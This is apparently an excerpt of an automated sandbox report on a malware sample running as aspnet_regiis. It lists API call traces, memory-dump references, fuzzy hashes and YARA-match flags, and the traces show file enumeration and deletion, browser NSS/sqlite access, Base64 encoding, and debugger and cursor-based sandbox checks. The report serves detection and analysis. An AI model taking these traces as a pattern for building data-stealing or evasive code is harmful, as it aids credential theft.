                                                                                                                                                                                • Part of subcall function 02A07FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,02A0E756,?,?,?), ref: 02A07FDE
                                                                                                                                                                                • Part of subcall function 02A07FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,02A0E756,?,?,?), ref: 02A07FF5
                                                                                                                                                                                • Part of subcall function 02A07FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,02A0E756,?,?,?), ref: 02A0800C
                                                                                                                                                                                • Part of subcall function 02A07FAC: CloseHandle.KERNEL32(?,?,?,?,?,02A0E756,?,?,?), ref: 02A08034
                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 02A0BE82
                                                                                                                                                                                • Part of subcall function 02A10519: lstrcpy.KERNEL32(00000000,?), ref: 02A10538
                                                                                                                                                                                • Part of subcall function 02A16E97: CreateThread.KERNEL32(00000000,00000000,02A16DC6,?,00000000,00000000), ref: 02A16F36
                                                                                                                                                                                • Part of subcall function 02A16E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 02A16F3E
                                                                                                                                                                              • FindNextFileA.KERNEL32(?,?), ref: 02A0BEF1
                                                                                                                                                                              • FindClose.KERNEL32(?), ref: 02A0BF05
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: File$lstrcpy$Find$CloseCreatelstrcat$AllocCopyDeleteFirstHandleLocalNextObjectReadSingleSizeSystemThreadTimeWaitlstrlen
                                                                                                                                                                              • String ID: \*.*
                                                                                                                                                                              • API String ID: 2055012574-1173974218
                                                                                                                                                                              • Opcode ID: f75a41bfe5a81f84a48f215f67516acde6c40f360ce203a4b4bdf1511fe213e9
                                                                                                                                                                              • Instruction ID: ac64bf79a03151ee310f01f71f388af556b4c8e5f9bb8e5cd07ea7eac21fd855
                                                                                                                                                                              • Opcode Fuzzy Hash: f75a41bfe5a81f84a48f215f67516acde6c40f360ce203a4b4bdf1511fe213e9
                                                                                                                                                                              • Instruction Fuzzy Hash: 1CE18231D802299BDF21EB24DE89ACDB776AF44325F4144E1A908B7160DF74AEC98F90
                                                                                                                                                                              APIs
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,00000002,?,6CC3CF46,?,6CB0CDBD,?,6CC3BF31,?,?,?,?,?,?,?), ref: 6CB1B039
                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6CC3CF46,?,6CB0CDBD,?,6CC3BF31), ref: 6CB1B090
                                                                                                                                                                              • sqlite3_free.NSS3(?,?,?,?,?,?,6CC3CF46,?,6CB0CDBD,?,6CC3BF31), ref: 6CB1B0A2
                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,6CC3CF46,?,6CB0CDBD,?,6CC3BF31,?,?,?,?,?,?,?,?,?), ref: 6CB1B100
                                                                                                                                                                              • sqlite3_free.NSS3(?,?,00000002,?,6CC3CF46,?,6CB0CDBD,?,6CC3BF31,?,?,?,?,?,?,?), ref: 6CB1B115
                                                                                                                                                                              • sqlite3_free.NSS3(?,?,?,?,?,?,6CC3CF46,?,6CB0CDBD,?,6CC3BF31), ref: 6CB1B12D
                                                                                                                                                                                • Part of subcall function 6CB09EE0: EnterCriticalSection.KERNEL32(?,?,?,?,6CB1C6FD,?,?,?,?,6CB6F965,00000000), ref: 6CB09F0E
                                                                                                                                                                                • Part of subcall function 6CB09EE0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6CB6F965,00000000), ref: 6CB09F5D
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalSection$sqlite3_free$EnterLeave$CloseHandle
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3155957115-0
                                                                                                                                                                              • Opcode ID: 9cafaadc78c06ed4038ac40a2c0c5443c6eeb536c62f26082dd5e0a676859197
                                                                                                                                                                              • Instruction ID: 20676d0d39dd156e085a8bbc231ef157ca1ee5f63a2ca2df352f861854a11b1b
                                                                                                                                                                              • Opcode Fuzzy Hash: 9cafaadc78c06ed4038ac40a2c0c5443c6eeb536c62f26082dd5e0a676859197
                                                                                                                                                                              • Instruction Fuzzy Hash: 6E91AEB1A082458FDB04DF65C884A6AB7B2FF45304F154A2DE416D7F50EB30F999CB52
                                                                                                                                                                              APIs
                                                                                                                                                                              • OpenInputDesktop.USER32(00000000,00000001,80000000), ref: 02A01823
                                                                                                                                                                              • SetThreadDesktop.USER32(00000000), ref: 02A0182A
                                                                                                                                                                              • GetCursorPos.USER32(?), ref: 02A0183A
                                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 02A0184A
                                                                                                                                                                              • GetCursorPos.USER32(?), ref: 02A01859
                                                                                                                                                                              • Sleep.KERNEL32(00002710), ref: 02A0186B
                                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 02A01870
                                                                                                                                                                              • GetCursorPos.USER32(?), ref: 02A0187F
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CursorSleep$Desktop$InputOpenThread
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3283940658-0
                                                                                                                                                                              • Opcode ID: 93cdf03013d287f6c2fb64ee6d8a61b0ed970964a0dc769ef729efb24f6bd0f4
                                                                                                                                                                              • Instruction ID: 1e31eefe6dfff29cb0b2d6909f7453729f804d11f1f9bc70807ab0195929edd0
                                                                                                                                                                              • Opcode Fuzzy Hash: 93cdf03013d287f6c2fb64ee6d8a61b0ed970964a0dc769ef729efb24f6bd0f4
                                                                                                                                                                              • Instruction Fuzzy Hash: 6B11FC31E10209EBEB10DBE4EDC9AEEB7B9AB44355F540865E605A2080DF70DB49CB64
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,02A2B735,?,02A284E6,?,000000BC,?), ref: 02A2B10B
                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,02A2B735,?,02A284E6,?,000000BC,?), ref: 02A2B134
                                                                                                                                                                              • GetACP.KERNEL32(?,?,02A2B735,?,02A284E6,?,000000BC,?), ref: 02A2B148
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InfoLocale
                                                                                                                                                                              • String ID: ACP$OCP
                                                                                                                                                                              • API String ID: 2299586839-711371036
                                                                                                                                                                              • Opcode ID: 2ec5f2ef61cf53c72a4744dcb0fb304f60441644724da549fe38e3af8eee02eb
                                                                                                                                                                              • Instruction ID: 4f73e2f473876cdca10072ff00f9220b945bb4c1f7285e7c15272510f6ca6956
                                                                                                                                                                              • Opcode Fuzzy Hash: 2ec5f2ef61cf53c72a4744dcb0fb304f60441644724da549fe38e3af8eee02eb
                                                                                                                                                                              • Instruction Fuzzy Hash: C2018431A41636BBEB219B68EC86F5A77FDAB0476CF200814F501E50C0EF60DA4ED664
                                                                                                                                                                              APIs
                                                                                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 02A1D44E
                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 02A1D463
                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(02A3332C), ref: 02A1D46E
                                                                                                                                                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 02A1D48A
                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 02A1D491
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2579439406-0
                                                                                                                                                                              • Opcode ID: 10ca55b14b7c470ff34684160ce3efaf22feea79132969a69f82dbcd200f3d14
                                                                                                                                                                              • Instruction ID: 4e66e552b6e74fe33fe3bcc4b306e37bce2e2406ee2e28ea7abd3a907d7a4c7c
                                                                                                                                                                              • Opcode Fuzzy Hash: 10ca55b14b7c470ff34684160ce3efaf22feea79132969a69f82dbcd200f3d14
                                                                                                                                                                              • Instruction Fuzzy Hash: C821CEB4C81B20DFD740DF64F588A4ABBA4BB08314F00891AE41987240EFB4D5ABCF56
                                                                                                                                                                              APIs
                                                                                                                                                                              • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,00000000,02C5E908,?,?,?,02A128A1,?,?,00000000), ref: 02A11E7D
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,?,02A128A1,?,?,00000000), ref: 02A11E8A
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02A11E91
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Heap$AllocateBinaryCryptProcessString
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 869800140-0
                                                                                                                                                                              • Opcode ID: 74adb56baf4cc5913a5126f4a0f5bab2c264104fab21bcd32dddc991c049977c
                                                                                                                                                                              • Instruction ID: ef54b38e809c0792af0cd82ec044fbc844387c1ba71b2bae61b0e251ae1b457e
                                                                                                                                                                              • Opcode Fuzzy Hash: 74adb56baf4cc5913a5126f4a0f5bab2c264104fab21bcd32dddc991c049977c
                                                                                                                                                                              • Instruction Fuzzy Hash: D8011E70900218FFDF118FA1DC84AAB7BBAFF492A4B144958F50993150DB719AA1DF20
                                                                                                                                                                              APIs
                                                                                                                                                                              • CryptStringToBinaryA.CRYPT32(02A06724,00000000,00000001,00000000,?,00000000,00000000), ref: 02A08060
                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?,?,?,02A06724,?), ref: 02A0806E
                                                                                                                                                                              • CryptStringToBinaryA.CRYPT32(02A06724,00000000,00000001,00000000,?,00000000,00000000), ref: 02A08084
                                                                                                                                                                              • LocalFree.KERNEL32(?,?,?,02A06724,?), ref: 02A08093
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: BinaryCryptLocalString$AllocFree
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4291131564-0
                                                                                                                                                                              • Opcode ID: fdcd62311e392a15857cb7465cfba56417f69686962898417dc63b6a5011ebf3
                                                                                                                                                                              • Instruction ID: ae89c7a7186858081a719cc44edf959555470fcaf167aeebccb6b8e5a5383b2b
                                                                                                                                                                              • Opcode Fuzzy Hash: fdcd62311e392a15857cb7465cfba56417f69686962898417dc63b6a5011ebf3
                                                                                                                                                                              • Instruction Fuzzy Hash: 15F0EC70541334BFDB315F66DC9DF8B7FA8EF06BA0B100555F909E6240E7718A90DAA1
                                                                                                                                                                              APIs
                                                                                                                                                                              • EnumSystemLocalesA.KERNEL32(Function_0002B1C1,00000001), ref: 02A2B56F
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: EnumLocalesSystem
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2099609381-0
                                                                                                                                                                              • Opcode ID: f761dc6c6b542249e67d932148e23a16134f80844cab7abf59cd16d269bb93d9
                                                                                                                                                                              • Instruction ID: 748a5251aa89bc9eda664d9efadcee871a01ff8282b302a164d9429773701289
                                                                                                                                                                              • Opcode Fuzzy Hash: f761dc6c6b542249e67d932148e23a16134f80844cab7abf59cd16d269bb93d9
                                                                                                                                                                              • Instruction Fuzzy Hash: 0FD05E71A50710ABE7204F349D497A177A0FB10B1AF209C49DC9249080DBB4A1DE8611
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: e066d75b3ce7ebd9a284dd543d92249b9d3d32655331b9ef1484d327e257e1b7
                                                                                                                                                                              • Instruction ID: 99d594c28858db37b069705362ce553c135abed93b05895eeb1c8db5e184e9da
                                                                                                                                                                              • Opcode Fuzzy Hash: e066d75b3ce7ebd9a284dd543d92249b9d3d32655331b9ef1484d327e257e1b7
                                                                                                                                                                              • Instruction Fuzzy Hash: 86112732A002458FDB24DF15D88475AB7B6FF4231CF04466ADC259FA41C376E982C7E2
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2680509045.000000006CB00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680807353.000000006CCDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680870106.000000006CCDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680890543.000000006CCE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680908405.000000006CCE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 2102b81f89a9ee679ba0fb72b700f8f4f385332b7460c3b13555640728c69955
                                                                                                                                                                              • Instruction ID: bab24eb5030dd3f74e1930d287cd6011440ae8da3319761ed8c3388fa17f36b2
                                                                                                                                                                              • Opcode Fuzzy Hash: 2102b81f89a9ee679ba0fb72b700f8f4f385332b7460c3b13555640728c69955
                                                                                                                                                                              • Instruction Fuzzy Hash: 8E11C174B043458FCB00DF19C8C066A7BB2FF86368F14806DD8198B701EB31E826CBA5
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 35f880b7d9409492cfbd2c31b6ba08b67b52b83fed8c053745051b7244bb587c
                                                                                                                                                                              • Instruction ID: 81b03007a1f881deed44a42fc0175a6fbd256bce6d09bf2effb1e14420dd7128
                                                                                                                                                                              • Opcode Fuzzy Hash: 35f880b7d9409492cfbd2c31b6ba08b67b52b83fed8c053745051b7244bb587c
                                                                                                                                                                              • Instruction Fuzzy Hash: DEE04278A55644DFC741CF58D195E99B7F0EB09368F158199E806DB761C274EE00DF00
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: f8d911352b7be11e8ef3f8d43dc69cd37138e10f06c97852b63a715cd4b250d5
                                                                                                                                                                              • Instruction ID: d256f1c99479b207678580fcb63197705f640815169115519c5f26934de16b0c
                                                                                                                                                                              • Opcode Fuzzy Hash: f8d911352b7be11e8ef3f8d43dc69cd37138e10f06c97852b63a715cd4b250d5
                                                                                                                                                                              • Instruction Fuzzy Hash: 1AE06C78A61648EFC740CF48C185E49B3F8FB09768F118095E905DB321C378EE00EB50
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: f1937a1b08348a57b00ab59f39d03f042d4a1f0e171b8ae631e82396fa0be247
                                                                                                                                                                              • Instruction ID: 6edc1f77bc014f77afb1dd4525fcd7db61d9a3eb149a076bd6fc7a55924a73f3
                                                                                                                                                                              • Opcode Fuzzy Hash: f1937a1b08348a57b00ab59f39d03f042d4a1f0e171b8ae631e82396fa0be247
                                                                                                                                                                              • Instruction Fuzzy Hash: D9C08C72529208EFD70DCB84D613F5AB3FCE704758F10409CE00293780C67DAB00CA58
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A0DB7F: lstrlen.KERNEL32(?,76DD5460,?,00000000), ref: 02A0DBBB
                                                                                                                                                                                • Part of subcall function 02A0DB7F: strchr.MSVCRT ref: 02A0DBCD
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,76DD5460,?,00000000), ref: 02A0DD04
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02A0DD0B
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02A0DD20
                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02A0DD27
                                                                                                                                                                              • strcpy_s.MSVCRT ref: 02A0DD43
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02A0DD55
                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02A0DD62
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02A0DD93
                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02A0DD9A
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 02A0DDA1
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02A0DDA8
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02A0DDBD
                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02A0DDC4
                                                                                                                                                                              • strcpy_s.MSVCRT ref: 02A0DDDA
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02A0DDEC
                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02A0DDF3
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02A0DE11
                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02A0DE18
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 02A0DE1F
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02A0DE26
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02A0DE3B
                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02A0DE42
                                                                                                                                                                              • strcpy_s.MSVCRT ref: 02A0DE52
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02A0DE64
                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02A0DE6B
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02A0DE93
                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02A0DE9A
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 02A0DEA1
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02A0DEA8
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02A0DEC3
                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02A0DECA
                                                                                                                                                                              • strcpy_s.MSVCRT ref: 02A0DEDD
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02A0DEEF
                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02A0DEF6
                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 02A0DEFF
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 02A0DF15
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02A0DF1C
                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 02A0DF34
                                                                                                                                                                                • Part of subcall function 02A0F128: std::_Xinvalid_argument.LIBCPMT ref: 02A0F13E
                                                                                                                                                                              • strcpy_s.MSVCRT ref: 02A0DF75
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,00000001,00000001), ref: 02A0DF9B
                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02A0DFA8
                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 02A0DFAD
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000001), ref: 02A0DFBC
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02A0DFC3
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02A0DFD7
